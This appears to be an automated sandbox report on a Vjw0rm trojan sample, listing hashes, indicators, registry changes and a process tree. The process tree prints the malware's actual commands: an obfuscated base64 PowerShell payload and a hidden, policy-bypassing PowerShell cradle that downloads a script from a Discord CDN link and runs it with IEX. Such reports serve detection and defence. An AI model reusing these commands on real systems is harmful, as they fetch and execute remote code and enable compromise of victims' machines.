vjw0rm | bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc

Analysis

max time kernel
154s
max time network
161s
platform
windows7_x64
resource
win7-en-20211208
submitted
03-02-2022 15:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe
Size

471KB
MD5

2ab5df8bedd64d6f06b3e885ae422cd0
SHA1

cf1f4cdf495a05eb143e5448eee6ee4ce527108e
SHA256

bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc
SHA512

587ca78b25c4498d5402d0a35ec55f1a693866507e0c5a9d30ac8f3e910e5256c906966a14de209b8fb1dffde3cc10d5759344a175ee4cfbb75e5bdcd982d30d

Score

10^/10

vjw0rm trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://cdn.discordapp.com/attachments/858084271553249342/863039759001452564/Main.png

Signatures

Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm

Blocklisted process makes network request 10 IoCs

Processes:

WScript.exeWScript.exepowershell.exe

flow	pid	process
9	1620	WScript.exe
10	620	WScript.exe
12	1620	WScript.exe
15	1620	WScript.exe
17	1620	WScript.exe
20	620	WScript.exe
33	620	WScript.exe
36	1868	powershell.exe
48	620	WScript.exe
60	620	WScript.exe

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

2.exe

pid process

1516 2.exe

pid	process
1516	2.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5.js	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5.js	WScript.exe

Loads dropped DLL 4 IoCs

Processes:

bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe

pid	process
2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe
2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe
2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe
2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

WScript.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e309000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	WScript.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

888 powershell.exe
1868 powershell.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

AcroRd32.exe

pid process

1528 AcroRd32.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exe2.exe

description pid process

Token: SeDebugPrivilege 888 powershell.exe
Token: SeDebugPrivilege 1868 powershell.exe
Token: SeDebugPrivilege 1516 2.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

AcroRd32.exe

pid process

1528 AcroRd32.exe
1528 AcroRd32.exe
1528 AcroRd32.exe
1528 AcroRd32.exe

pid	process
888	powershell.exe
1868	powershell.exe

pid	process
1528	AcroRd32.exe

description	pid	process
Token: SeDebugPrivilege	888	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	1516	2.exe

pid	process
1528	AcroRd32.exe
1528	AcroRd32.exe
1528	AcroRd32.exe
1528	AcroRd32.exe

Suspicious use of WriteProcessMemory 53 IoCs

Processes:

bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exeWScript.execmd.exeWScript.exe

description	pid	process	target process
PID 2024 wrote to memory of 1528	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	AcroRd32.exe
PID 2024 wrote to memory of 1528	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	AcroRd32.exe
PID 2024 wrote to memory of 1528	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	AcroRd32.exe
PID 2024 wrote to memory of 1528	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	AcroRd32.exe
PID 2024 wrote to memory of 1528	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	AcroRd32.exe
PID 2024 wrote to memory of 1528	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	AcroRd32.exe
PID 2024 wrote to memory of 1528	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	AcroRd32.exe
PID 2024 wrote to memory of 1516	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	2.exe
PID 2024 wrote to memory of 1516	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	2.exe
PID 2024 wrote to memory of 1516	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	2.exe
PID 2024 wrote to memory of 1516	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	2.exe
PID 2024 wrote to memory of 1620	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 1620	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 1620	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 1620	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 1620	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 1620	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 1620	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 1704	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 1704	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 1704	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 1704	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 1704	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 1704	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 1704	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 1704 wrote to memory of 112	1704	WScript.exe	cmd.exe
PID 1704 wrote to memory of 112	1704	WScript.exe	cmd.exe
PID 1704 wrote to memory of 112	1704	WScript.exe	cmd.exe
PID 1704 wrote to memory of 112	1704	WScript.exe	cmd.exe
PID 1704 wrote to memory of 112	1704	WScript.exe	cmd.exe
PID 1704 wrote to memory of 112	1704	WScript.exe	cmd.exe
PID 1704 wrote to memory of 112	1704	WScript.exe	cmd.exe
PID 2024 wrote to memory of 620	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 620	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 620	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 620	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 620	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 620	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 2024 wrote to memory of 620	2024	bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe	WScript.exe
PID 112 wrote to memory of 1868	112	cmd.exe	powershell.exe
PID 112 wrote to memory of 1868	112	cmd.exe	powershell.exe
PID 112 wrote to memory of 1868	112	cmd.exe	powershell.exe
PID 112 wrote to memory of 1868	112	cmd.exe	powershell.exe
PID 112 wrote to memory of 1868	112	cmd.exe	powershell.exe
PID 112 wrote to memory of 1868	112	cmd.exe	powershell.exe
PID 112 wrote to memory of 1868	112	cmd.exe	powershell.exe
PID 1620 wrote to memory of 888	1620	WScript.exe	powershell.exe
PID 1620 wrote to memory of 888	1620	WScript.exe	powershell.exe
PID 1620 wrote to memory of 888	1620	WScript.exe	powershell.exe
PID 1620 wrote to memory of 888	1620	WScript.exe	powershell.exe
PID 1620 wrote to memory of 888	1620	WScript.exe	powershell.exe
PID 1620 wrote to memory of 888	1620	WScript.exe	powershell.exe
PID 1620 wrote to memory of 888	1620	WScript.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe
"C:\Users\Admin\AppData\Local\Temp\bb4fc8b24c345743968f905c9f3f7a47e008e787df111236e54dd02dbb6b3ebc.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2024

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\1.pdf"
2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1528

C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3.vbs"
2⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J?BP?F??TgBV?C??PQ?g?Cc?JQBT?HM?cQBC?Eg?R?Bw?Gk?SwBH?CU?Jw?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?TgBy?Ew?S??g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?E8?U?BO?FU?LgBy?GU?c?Bs?GE?YwBl?Cg?JwCTITo?kyEn?Cw?JwBB?Cc?KQ?g?Ck?OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?E4?cgBM?Eg?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?EM?b?Bh?HM?cwBM?Gk?YgBy?GE?cgB5?DE?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?VwBB?E0?Zg?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?JwBs?Dk?VgBp?Ew?ZgB4?EM?QQBm?EU?e??v?GQ?YQBv?Gw?bgB3?G8?Z??v?G0?bwBj?C4?bwBp?GU?d?Bz?GE?c??v?C8?OgBw?HQ?d?Bo?Cc?KQ?p??==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('?','A') ) ).replace('%SsqBHDpiKG%','<!DOCTYPE html> <html lang="en">  <head> <title>Item not available</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <link href="https://archive.org/includes/build/css/archive.min.css?v=66127" rel="stylesheet" type="text/css"/> <link rel="SHORTCUT ICON" href="https://archive.org/images/glogo.jpg"/> </head> <body class="navia"> <a href="#maincontent" class="hidden-for-screen-readers">Skip to main content</a>  <div id="wrap"> <div id="navwrap1"> <div id="navwrap2"> <div class="navbar navbar-inverse navbar-static-top1" role="navigation"> <div id="nav-tophat-helper" class="hidden-xs"></div> <ul class="nav navbar-nav navbar-main"> <li class="pull-left"> <a title="Home" class="navia-link home" href="https://archive.org/" target="_top"> <span class="iconochive-logo"></span> <span>Home</span> </a> </li> <li class="dropdown dropdown-ia pull-left"> <a title="Web" class="navia-link web" data-top-kind="web" href="https://archive.org/web/" target="_top"><span class="iconochive-web" aria-hidden="true"></span><span>Web</span></a> </li> <li class="dropdown dropdown-ia pull-left"> <a title="Books" class="navia-link books" data-top-kind="books" href="https://archive.org/details/books" target="_top"><span class="iconochive-books" aria-hidden="true"></span><span>Books</span></a> </li> <li class="dropdown dropdown-ia pull-left"> <a title="Video" class="navia-link movies" data-top-kind="movies" href="https://archive.org/details/movies" target="_top"><span class="iconochive-movies" aria-hidden="true"></span><span>Video</span></a> </li> <li class="dropdown dropdown-ia pull-left"> <a title="Audio" class="navia-link audio" data-top-kind="audio" href="https://archive.org/details/audio" target="_top"><span class="iconochive-audio" aria-hidden="true"></span><span>Audio</span></a> </li> <li class="dropdown dropdown-ia pull-left"> <a title="Software" class="navia-link software" data-top-kind="software" href="https://archive.org/details/software" target="_top"><span class="iconochive-software" aria-hidden="true"></span><span>Software</span></a> </li> <li class="dropdown dropdown-ia pull-left rightmost"> <a title="Images" class="navia-link images" data-top-kind="images" href="https://archive.org/details/images" target="_top"><span class="iconochive-images" aria-hidden="true"></span><span>Images</span></a> </li> <li class="dropdown dropdown-ia pull-right leftmost"> <a class="nav-upload" href="https://archive.org/create" _target="top" data-event-click-tracking="TopNav|UploadIcon"><span class="iconochive-upload" aria-hidden="true"></span><span class="sr-only">upload</span><span class="hidden-xs-span hidden-sm-span">UPLOAD</span></a> </li> </ul> <ul id="nav-abouts" class=""> <li><a target="_top" data-event-click-tracking="TopNav|AboutLink" href="https://archive.org/about/">ABOUT</a></li> <li><a target="_top" data-event-click-tracking="TopNav|ContactLink" href="https://archive.org/about/contact.php">CONTACT</a></li> <li><a target="_top" data-event-click-tracking="TopNav|BlogLink" href="https://blog.archive.org">BLOG</a></li> <li><a target="_top" data-event-click-tracking="TopNav|ProjectsLink" href="https://archive.org/projects">PROJECTS</a></li> <li><a target="_top" data-event-click-tracking="TopNav|HelpLink" href="https://archive.org/about/faqs.php">HELP</a></li> <li><a target="_top" data-event-click-tracking="TopNav|DonateLink" href="https://archive.org/donate">DONATE</a></li> <li><a target="_top" data-event-click-tracking="TopNav|JobsLink" href="https://archive.org/about/jobs.php">JOBS</a></li> <li><a target="_top" data-event-click-tracking="TopNav|VolunteerLink" href="https://archive.org/about/volunteerpositions.php">VOLUNTEER</a></li> <li><a target="_top" data-event-click-tracking="TopNav|PeopleLink" href="https://archive.org/about/bios.php">PEOPLE</a></li> </ul> </div> </div> </div>  <main id="maincontent"> <div class="container container-ia"> <h1>Item not available</h1> The item is not available due to issues with the item's content. </div> </main> </div> </body> </html> ');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:888

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://cdn.discordapp.com/attachments/858084271553249342/863039759001452564/Main.png');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
3⤵
- Suspicious use of WriteProcessMemory
PID:112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://cdn.discordapp.com/attachments/858084271553249342/863039759001452564/Main.png');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5.js"
2⤵
- Blocklisted process makes network request
- Drops startup file
PID:620

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1.pdf
MD5
1acd953736837187c459334a1fdbe26f

SHA1
d29a6321fa4e40b60e60bf43f995b1266056a6fd

SHA256
59d3376f1b288f4d3275599ab13d59c8e1473eabe3909eeddcc8951293db4e25

SHA512
49d9264c463101f2540a0e55508180c56945dfe19a08ccbd87c8ef92ef64c124f7daae5ab2fdad84bea44be99e71f7f775fcea170bf01d7297f8e665ce68e8aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe
MD5
4b283baa12a209b8eadbfaa9ffe6f04f

SHA1
789347efb1e89529f5384f96712db968d6bee6c6

SHA256
b6feffbf4a950c25fe63ac60d4c363543d5bdf3d67bf4f5428839851283a22b9

SHA512
2d3887c93d3baea0c6b47c60da89baeca862fe662ecb4d27ca57102882768e30d9e50ef4e7d89cc5fba8e36e0df8304a6a698e1574f922b32dc8bf039dbcc242

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.exe
MD5
4b283baa12a209b8eadbfaa9ffe6f04f

SHA1
789347efb1e89529f5384f96712db968d6bee6c6

SHA256
b6feffbf4a950c25fe63ac60d4c363543d5bdf3d67bf4f5428839851283a22b9

SHA512
2d3887c93d3baea0c6b47c60da89baeca862fe662ecb4d27ca57102882768e30d9e50ef4e7d89cc5fba8e36e0df8304a6a698e1574f922b32dc8bf039dbcc242

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.vbs
MD5
bcb5d17ebd45a91a59a54bc587154c2a

SHA1
ead4feaeeba8beb7c85dd641b696e725f6eb0831

SHA256
08722afddb0d56dca671c062d2a451a6d206c56c7b26bb3149269132309b7156

SHA512
efd1264dfde35cbd18ae1fdd0fbe2e7311b0344bf86f667aa18a3e4a485b59941863d27f45da026dada9b6bc32a1b835a65e60e43a598409cb85f668676a0bfc

Download Submit
C:\Users\Admin\AppData\Local\Temp\4.vbs
MD5
d2166118970807cea9ec8fcd98609fb6

SHA1
20a97bb071e0f5acbdd20a4db333c1c12a9544a0

SHA256
fc56d4dff3de4ee4c68a1484e95799c823082b284a99faa543760985c17837c7

SHA512
9c6418980671fa6c0ce95c19f679a3bb95b75f08162836a61364887a139669abf379a7a3de41476899f48e4a2aa61acbaa02fea495b84d5c93c2ff8fe15d7c4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\5.js
MD5
f96643f7d5e922e098bf61653d7fd7e3

SHA1
880ba6ceb774545bad1cce080fd2c5ac026dc99b

SHA256
d78c4c83df8c568958db6582518438625bf66c77189681da52435f165396e187

SHA512
f10f9f137b18283fc44e04bdf56b8fb1f00d55ea0d78633f6ec799c1556d9c030072696ce6e93436554597bc1635ab93d531f0d0eb3db2c20287b42ae538af6d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
55473f65c451de50ed2327595da298ee

SHA1
713bfa28a21e10e6a10fbd422b4a21b67a7d42bf

SHA256
171f76ab73f589cad65bcae40a24d7271e75660e0568c54599880c7d59a52ffe

SHA512
4ddad4314a17ccb9b58e3b5974037dfbeda9aa5d3942e7360b5b905e8e11e390e0457b0218f1235c08bfb1723196d1eb95e1bed0225b4dd17ee49c62e6fba4d2

Download Submit
\Users\Admin\AppData\Local\Temp\2.exe
MD5
4b283baa12a209b8eadbfaa9ffe6f04f

SHA1
789347efb1e89529f5384f96712db968d6bee6c6

SHA256
b6feffbf4a950c25fe63ac60d4c363543d5bdf3d67bf4f5428839851283a22b9

SHA512
2d3887c93d3baea0c6b47c60da89baeca862fe662ecb4d27ca57102882768e30d9e50ef4e7d89cc5fba8e36e0df8304a6a698e1574f922b32dc8bf039dbcc242

Download Submit
\Users\Admin\AppData\Local\Temp\2.exe
MD5
4b283baa12a209b8eadbfaa9ffe6f04f

SHA1
789347efb1e89529f5384f96712db968d6bee6c6

SHA256
b6feffbf4a950c25fe63ac60d4c363543d5bdf3d67bf4f5428839851283a22b9

SHA512
2d3887c93d3baea0c6b47c60da89baeca862fe662ecb4d27ca57102882768e30d9e50ef4e7d89cc5fba8e36e0df8304a6a698e1574f922b32dc8bf039dbcc242

Download Submit
\Users\Admin\AppData\Local\Temp\2.exe
MD5
4b283baa12a209b8eadbfaa9ffe6f04f

SHA1
789347efb1e89529f5384f96712db968d6bee6c6

SHA256
b6feffbf4a950c25fe63ac60d4c363543d5bdf3d67bf4f5428839851283a22b9

SHA512
2d3887c93d3baea0c6b47c60da89baeca862fe662ecb4d27ca57102882768e30d9e50ef4e7d89cc5fba8e36e0df8304a6a698e1574f922b32dc8bf039dbcc242

Download Submit
\Users\Admin\AppData\Local\Temp\2.exe
MD5
4b283baa12a209b8eadbfaa9ffe6f04f

SHA1
789347efb1e89529f5384f96712db968d6bee6c6

SHA256
b6feffbf4a950c25fe63ac60d4c363543d5bdf3d67bf4f5428839851283a22b9

SHA512
2d3887c93d3baea0c6b47c60da89baeca862fe662ecb4d27ca57102882768e30d9e50ef4e7d89cc5fba8e36e0df8304a6a698e1574f922b32dc8bf039dbcc242

Download Submit
memory/888-79-0x0000000001F80000-0x0000000002BCA000-memory.dmp

Filesize
12.3MB

Download
